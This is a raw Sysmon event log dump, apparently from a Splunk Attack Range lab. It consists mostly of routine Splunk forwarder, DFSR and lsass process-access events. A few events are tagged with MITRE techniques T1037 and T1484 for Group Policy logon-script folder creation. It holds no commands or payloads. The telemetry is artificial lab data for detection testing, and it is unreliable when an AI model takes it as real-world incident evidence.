Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC879E430BB26ACD9A41CB68ADAF3828,SHA256=CE541D3BA723DE3C264D0E37C57BEF732A8E08EC859F44868C09A0BDFEADA1B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286439Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:32.747{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FA6F254E795E893C1795ADBD94200D1,SHA256=D791774E4593299F63499FAF999F3E1727BB9E055A52A823B50FB1454DB03E2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215360Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:32.163{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12964067F73FD94C2279D60C6F664686,SHA256=1886626E8809A4A39F10F32CA8A02045D223586854526E72791D7F02DF15CEC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286441Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:33.763{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40F6480CB08BD1D3751668EE193AA3CF,SHA256=E853164947E1CBA96EFB9BD2183A6824870720DDA4834D110FA23F3985A6DD03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215361Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:33.178{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6D79EE79C36E9CC246C07549D3EBFBD,SHA256=896F82D3C8C018A2A10A3388F21A9539F82E75BB94D588CBCD08D1CC46F0C9FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286440Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:33.310{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=DEB6182CC2AFC957F6C2140C4D102818,SHA256=E9D582F80B6B136E5B9588EF16B5B4112B73E775584E7ADAA9BA3402087B3132,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286442Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:34.779{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F31DBF985DEA458EC39A50539718CA53,SHA256=3C84D21470E05392E2B59E94271BDA165F5CEE80DAAAF6939DAB6EE93B0EC153,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215362Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:34.194{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A30FDD91F74788A2C07DE73E5CCAD7A,SHA256=8081BC99FC1D2DDF14D61828812EC2F384D7F0F722BC0DDDAC0C98EC94916E4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286443Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:35.794{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC68574855D83AB53970D8B7864279DD,SHA256=8C407755CF7E468B5E34D0505DA16E57A973E8419A34B8B4DA3B4E22FAFDFFF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215363Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:35.194{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=908C166CB19A8C9E38BA21C56C6058B7,SHA256=7EE8A9EAF2D7E6917615D06ACC86E02989F400091213FE530A45FB2822A53745,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286444Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:36.794{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1940228FC9BC398E87BA05D161B99035,SHA256=2ACA4E71FCB5AA19C30A61AABFDF78ABBEAC96FDAB4B1C6738907C426972A13B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215364Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:36.209{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37867CA272B60DD0750AFA35D1BD69E6,SHA256=E3EA9E4AC59FF1F2E91EBE961A11A270B1CAA6F844C994AAB484FC339772DA39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286445Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:37.810{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1490724FDDA717FF933A5C310132088D,SHA256=3154207EFA696EA042E7294F27A78A3E0C7AEA6B2291FD7B5D757284F1F4733B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215366Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:34.508{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51254-false10.0.1.12-8000- 23542300x8000000000000000215365Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:37.225{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5F30B30B4B7912F1C8E8C195ED9CEEC,SHA256=3D1BF79D40D60CB1B8A79E44C9FCEC84E8DAD0B9DFCAB8BF35A8B1E3B27C0E16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286447Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:38.841{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F0CFB05258E6621DDE9514F3C4159F7,SHA256=3CA259A3C57B3F6C181C141F5BDCDD4137AD5B2297DE3731948545CC1AB3F6F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286446Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:35.597{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53334-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000215367Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:38.225{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=690DAE6EC1A3BFC681F61B60A7329256,SHA256=869671FA89C9F33CDF744E4A04C35F505030AFB383785FD3B5B709417B300C8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286448Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:39.638{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215368Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:39.241{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=580FF3EC586F4FFED2E42BA16A26F854,SHA256=F99DEE5D698287ACBDF72D3A17EC02FD5C30D8F9904BB7D05EB19FBAD36E8296,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215369Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:40.241{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D814932A74119ED9CEDC6D3A530EC5C,SHA256=8F10A1CA1CD1C4B423B3C3BACC4CBCDE0A0A15A8EE5A758C6E6C2F34C02C0D0A,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000286452Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1037,T14842022-02-23 10:43:40.279{C8EA50B7-0F2D-6216-C404-000000003802}1164C:\Windows\system32\mmc.exeC:\Windows\System32\GroupPolicy\User\Scripts\Logoff2022-02-23 10:43:40.279 11241100x8000000000000000286451Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1037,T14842022-02-23 10:43:40.279{C8EA50B7-0F2D-6216-C404-000000003802}1164C:\Windows\system32\mmc.exeC:\Windows\System32\GroupPolicy\User\Scripts\Logon2022-02-23 10:43:40.279 11241100x8000000000000000286450Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1037,T14842022-02-23 10:43:40.279{C8EA50B7-0F2D-6216-C404-000000003802}1164C:\Windows\system32\mmc.exeC:\Windows\System32\GroupPolicy\User\Scripts2022-02-23 10:43:40.279 23542300x8000000000000000286449Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:39.998{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE371E47108A2CECFCA6F17E5FF029FA,SHA256=DAC979078B2A791B1B59EFDBE505321ED6B6CD270F61E3CB569A7E11A12AB1BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215370Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:41.256{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D3C35A69163AEF307F009D5956EDAD8,SHA256=59D74870209BC35E60FF02604CBFC51C689914FBD2885C080B9E62C790FF987A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286453Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:41.013{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48937294D519A468033363AE91AC9CB6,SHA256=17B636B971B50AACF21D85E56068C228EB1DE5574CA5B2DD8BA1F57982F5ACE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286455Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:39.097{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53335-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000286454Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:42.029{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C1A124ED460E5F1C8F3C5C2E7A86175,SHA256=180E3E92D04A0A4D97D3BD496E7DEE809D4F5EF22E33BCCD291BBD2B7D03A9BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215371Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:42.272{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DABC471458E8267B9D89B5F6ECC074CD,SHA256=698DE0C9097CE51475A776FE93F421947C4728441DC9CA579663B73629DA8CA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286456Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:43.044{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13A6CC82E150FD2E317C840EDCE292E8,SHA256=6BC023056F7DE042461510795EB2A66ED74186F3C3CE2FACF222C6304D3E307D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215373Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:40.477{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51255-false10.0.1.12-8000- 23542300x8000000000000000215372Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:43.272{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFB3168C904EA66E75D4DAE2CE373B34,SHA256=AA4482912255A22FCBE6CE072FF4EC3ED741CC82ADB69F880C92F8591ECF7F47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215374Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:44.287{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23F720EF843F9A94EC9C606FCE6A3CF2,SHA256=1B1A37F5D632FD28E3E120B45AB75B0FA22CB9F6313AB4C67B9369FBE713D0D7,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000286463Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:43:44.716{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\6FC0DF5C-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_6FC0DF5C-0000-0000-0000-100000000000.XML 13241300x8000000000000000286462Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:43:44.716{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Config SourceDWORD (0x00000001) 13241300x8000000000000000286461Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:43:44.716{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_BA30863B-E0B8-488B-829D-A0E9DE6AE59C.XML 10341000x8000000000000000286460Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:44.701{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286459Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:44.701{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000286458Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:41.519{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53336-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286457Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:44.076{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE9EBB403B3D02EDBC79B533482B88EA,SHA256=4DC45AF36364E2E39FBE4E22976FB1B239DD67C5639A6A2917B2D1C417047CE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215403Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.835{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215402Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.709{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0FE1-6216-2704-000000003902}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215401Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.709{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215400Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.709{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215399Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:45.709{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215398Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 